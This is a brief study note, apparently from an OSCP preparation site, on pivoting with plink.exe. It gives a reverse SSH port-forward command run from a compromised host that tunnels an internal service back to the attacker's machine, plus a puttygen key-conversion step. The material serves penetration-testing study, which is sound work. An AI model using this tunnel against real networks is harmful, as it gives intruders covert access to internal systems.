// notes/ Pivoting & Tunneling
🚀
Pivoting Good To Know Plink.Exe
Pink.exe explained [here](/windows-privilege-escalation/stored-passwords-and-port-forwarding.md#port-forwarding)
#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/pivoting_good-to-know_plink.exe ↗Plink.exe
Overview
Pink.exe explained here
Reverse SSH Connection with plink.exe (STILL A NO NO)
For example, if we have access to 172.16.0.5 and would like to forward a connection to 172.16.0.10:80 back to port 8000 our own attacking machine (172.16.0.20), we could use this command
powerquery
01cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -NYou will have to convert the ssh-keygen files using puttygen
bash
$puttygen KEYFILE -o OUTPUT_KEY.ppk